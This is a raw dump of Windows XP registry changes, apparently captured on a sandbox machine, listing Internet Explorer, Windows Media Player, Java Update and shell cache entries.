HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Internet Explorer\iexplore.exe "Internet Explorer"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Type dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Flags dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Count dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,80,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Type dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Flags dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Count dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,44,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore Count dword:00000004 dword:00000005
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,35,00,e0,03, hex:dc,07,09,00,06,00,16,00,10,00,1e,00,05,00,51,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore Count dword:00000002 dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,05,00,0b,00,3c,02, hex:dc,07,09,00,06,00,16,00,10,00,1c,00,26,00,a0,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore Count dword:00000002 dword:00000007
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,28,01, hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,b0,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore LoadTime dword:00000088 dword:0000009d
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore Count dword:00000003 dword:00000004
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache @shell32.dll,-12704 "Internet P&roperties"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache @C:\WINDOWS\system32\ieframe.dll.mui,-39229 "Browse Without &Add-ons"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache @shell32.dll,-12705 "&Browse the Internet"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Internet Explorer\iexplore.exe "Internet Explorer"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache @xpsp1res.dll,-11005 "Sends and receives e-mail and newsgroup messages."
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Wireshark\wireshark.exe "Wireshark"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Common Files\Java\Java Update\jucheck.exe "Java(TM) Update Checker"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Windows Media Player\setup_wm.exe "Microsoft Windows Media Configuration Utility"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\system32\taskmgr.exe "Windows TaskManager"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\explorer.exe "Windows Explorer"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache @xpsp3res.dll,-20000 "Network Diagnostics for Windows XP"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache @shell32.dll,-12691 "My Recent Documents"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache @C:\WINDOWS\system32\SHELL32.dll,-9217 "My Network Places"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\inf\unregmp2.exe "Microsoft Windows Media Player Setup Utility"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Windows Media Player\wmplayer.exe "Windows Media Player"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General UniqueID "{ECE4B67E-5176-48A8-A4E7-7CD222821F18}"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General ComputerName "SANDBOX"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General VolumeSerialNumber dword:20d334b5
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace LocalBase "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace DTDFile "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace LocalDelta "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace RemoteDelta "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"
HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications "C:\PROGRA~1\WINDOW~2\wmplayer.exe" "Yes"
HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications C:\PROGRA~1\WINDOW~2\wmplayer.exe "Yes"
HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications "C:\Program Files\Windows Media Player\wmplayer.exe" "Yes"
HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications C:\Program Files\Windows Media Player\wmplayer.exe "Yes"
HKEY_CURRENT_USER\SessionInformation ProgramCount dword:00000001 dword:00000005
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand @ "Windows Media Player"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand\CLSID @ "{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1 @ "Windows Media Player"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1\CLSID @ "{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9} @ "Windows Media Player"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories\{00021492-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32 @ "C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32 ThreadingModel "Apartment"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID @ "WMP.DeskBand.1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID @ "WMP.DeskBand"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52} @ "IWMPDeskBand"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid @ "{00020424-0000-0000-C000-000000000046}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32 @ "{00020424-0000-0000-C000-000000000046}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib @ "{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib Version "1.0"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer CLSID "{cd3afa96-b84f-48f0-9393-7edc34128127}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0 @ "WMPDeskBand 1.0 Type Library"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32 @ "C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS @ "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR @ "C:\PROGRA~1\WINDOW~2\"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy PostStatusUrl "https://sjremetrics.java.com/b/ss//6" "https://nometrics.java.com"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy UpdateSchedule dword:00000011 dword:00000003
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy Frequency dword:01184000 dword:01020800
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy UpdateMin dword:00000024 dword:00000019
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy ScheduleId "S-1-5" "S-1-5-21-484763869-706699826-1060284298"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy Method "jau"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy LastUpdateBeginTime "Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy LastUDCheckTime "Sat, 22 Sep 2012 16:30:11 GMT"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy VersionXmlChecksum "5d18fd23851119c46b57669867f4c625390fbed3"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy LocalFileName "http://javadl.sun.com/webapps/download/GetFile/1.6.0_35-b10/windows-i586/jre-6u35-windows-i586-iftw.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy InstallOptions "/installmethod=jau SP1OFF=1 SP2OFF=1 SP3OFF=1 SP4OFF=1 SP5OFF=1 SP6OFF=1 SP7OFF=1 SP8OFF=1 SP9OFF=1 SP10OFF=1 SP13OFF=1 SP15OFF=1 MSDIR=ms5 SPWEB=http://javadl-esd.sun.com/update/1.6.0/sp-1.6.0_35-b10 "
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy UpdateDescription "Java 6 Update 35 is ready to install. Click the Install button to update Java now. If you wish to update Java later, click the Later button."
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy UpdateMoreInfoUrl "http://java.com/infourl"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy BalloonTitle "Java Update Available"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy BalloonTip "A new version of Java is ready to be installed."
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy UpdateTitle1 "Java Update Available"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy DlgCaption "Java Update - Update Available"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy MoreInfoTxt "More information..."
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy InstalledJREVersion "1.6.0_29"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy NewJREVersion "1.6.0_35-b10"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy PreDownldStatus dword:00000012
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy UpdAvailNotifyCnt dword:00000001
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy UpdAvailNotifyTime dword:0005b708
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG Seed hex:4b,98,83,aa,b8,84,79,15,5c,f2,41,1f,58,85,65,dd,da,5c,10,c2,4e,97,fc,bf,e8,02,7d,2b,ed,20,24,e6,85,25,90,84,33,a2,48,95,15,19,e3,f4,07,47,a0,41,ec,7e,cf,61,a2,75,19,7b,6b,a2,ae,e4,a9,bf,61,25,52,78,04,ec,79,60,0b,aa,16,2c,27,b2,57,0c,07,d3, hex:16,65,03,44,e9,42,2e,8c,1e,62,1e,55,0f,02,89,7c,f7,5e,b9,12,35,f2,e2,4e,11,4f,f9,2d,0e,e0,2f,84,b3,3f,c7,17,21,5e,93,05,75,47,43,84,ad,c6,5b,e5,d7,2e,5b,88,01,a3,6d,02,2b,79,e5,71,63,a7,e2,41,0d,ad,04,59,53,1c,07,1f,27,3a,bc,b0,2d,6d,0f,6a,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication Name "mshta.exe" "wmplayer.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication ID dword:49b3ac74 dword:48025cf1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\Preferences MyPlayLists "C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists" "C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Devices\AudioCD UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aif UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aifc UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aiff UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.asf UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.asx UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.au UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.avi UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.cda UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.dvr-ms UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.m1v UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.m3u UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mid UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.midi UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp2 UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp2v UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp3 UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpa UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpe UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpeg UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpg UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpv2 UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.rmi UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.snd UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wav UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wax UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wm UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wma UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmd UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmv UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmx UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmz UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wpl UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wvx UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/vnd.ms-wpl UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-mplayer2 UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-ms-wmd UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-ms-wmz UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/aiff UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/basic UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mid UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/midi UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mp3 UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpeg UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpegurl UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpg UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/wav UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-aiff UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mid UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-midi UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mp3 UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpeg UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpegurl UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpg UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-ms-wax UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-ms-wma UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-wav UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\midi/mid UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/avi UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/mpeg UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/mpg UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/msvideo UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-mpeg UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-mpeg2a UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-asf UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-asf-plugin UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wm UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wmv UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wmx UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wvx UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-msvideo UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mms UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mmst UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mmsu UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\msbd UserApprovedOwning "yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19 RefCount dword:00000003 dword:00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control ActiveService "RasMan"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control
